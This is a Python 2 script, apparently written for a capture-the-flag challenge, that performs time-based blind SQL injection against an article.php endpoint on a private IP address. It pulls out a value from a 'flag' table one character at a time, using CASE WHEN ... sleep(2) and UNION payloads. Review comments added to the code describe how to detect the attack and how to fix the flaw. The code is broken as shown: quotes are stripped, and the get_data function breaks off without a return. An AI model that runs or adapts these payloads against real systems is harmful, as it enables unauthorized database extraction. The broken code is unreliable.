import requests
import random
import hashlib
import time
# Module-level state shared by the functions below.
# NOTE(review): quote characters appear to have been stripped from this
# listing (here and in the `ljust` pad argument and the `?id=` fragment
# further down), so several lines do not parse as shown.
s = requests.Session()  # not referenced by the visible code; get_response() opens its own Session
url=http://10.66.20.180:3002/article.php  # endpoint that get_data() appends "?id=<payload>" to
tables_count_num = 0  # never read in the visible code
# Candidate alphabet tried, one character at a time, for every position of the
# value get_content() reconstructs.  The order here is the order of guesses.
strings = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@!#$%*().<>1234567890{}"
def get_content(url):
    """Reconstruct one database value by timing-based inference, one character at a time.

    Two phases, both driven by get_data(payload) (defined below, body only
    partly visible): first the length of the value is found by testing
    equality against 0..49, then each position is filled by testing a LIKE
    prefix against every character in the module-level ``strings``.  Every
    payload is a ``CASE WHEN <condition> THEN sleep(2) ELSE 0 END``
    expression, so the only information returned to the client is whether
    the response was delayed; get_data() is assumed to return a truthy value
    when that delay was observed (its body is cut off here, so confirm).

    Args:
        url: unused.  The requests are issued by get_data(), which reads the
             module-level ``url`` rather than this parameter.

    Side effects: prints progress with Python 2 ``print`` statements.

    Defender's note: from the server side this shows up as a burst of
    requests to the same endpoint whose ``id`` parameter contains
    ``select case when ... sleep(2)`` and ``union/**/select``, with response
    latency that is bimodal (baseline vs. roughly +2 s).  The underlying
    weakness is string concatenation of ``id`` into SQL; parameterized
    queries remove it, and per-request latency monitoring detects it.
    """
    # Phase 1: find the length of the target value (4th column of the second
    # row of the UNION, per `limit 1 offset 1`).  content_length is only
    # bound if one of the 50 guesses matches.
    for i in xrange(50):
        # payload = "1 and ((SELECT length(user) from admin limit 1)="+str(i)+") and (sleep(2))"
        # payload = "(select case when ((SELECT length(t.2) from (select 1,2,3,4 union select * from flag) limit "+str(j)+") >"+str(i)+") then 0 else sleep(2) end)"
        payload = "(select case when ((SELECT length(t.4) from (select * from((select 1)a join(select 2)b join (select 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) ="+str(i)+") then sleep(2) else 0 end)"
        if get_data(payload):
            print "[*] content_length: "+str(i)
            content_length = i
            break
    # Phase 2: grow `content` by one character per outer iteration.
    content = ""
    tmp_content = ""
    for i in range(1,content_length+1):
        for k in strings:
            # Prefix found so far plus the current guess, padded to the full
            # length before being compared with LIKE.
            tmp_content = content+str(k)
            tmp_content = tmp_content.ljust(content_length,_)
            # payload = "1 and (SELECT ascii(mid(((SELECT user from admin limit 1))from("+str(i)+")))="+str(k+1)+") and (sleep(2))"
            payload = "(select case when ((SELECT t.4 from (select * from((select 1)a join(select 2)b join (select 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) like "+tmp_content+") then sleep(2) else 0 end)"
            # print payload
            if get_data(payload):
                # A delayed response means the guess for this position held.
                content += k
                print "[*] content: "+content
                break
    print "[*] content: " + content
def get_response(payload):
    """Unfinished stub; nothing in the visible code calls it.

    Creates a fresh Session (shadowing the module-level ``s``), binds a fixed
    username, and calls ``s.post()`` with no arguments, which raises
    TypeError as written.  ``payload`` and ``username`` are never used.
    """
    s = requests.Session()
    username = "teststeststests1234"
    s.post()
def get_data(payload):
u = url+?id=+payload
print u
otime = time.time()
# print u.replace( ,%20)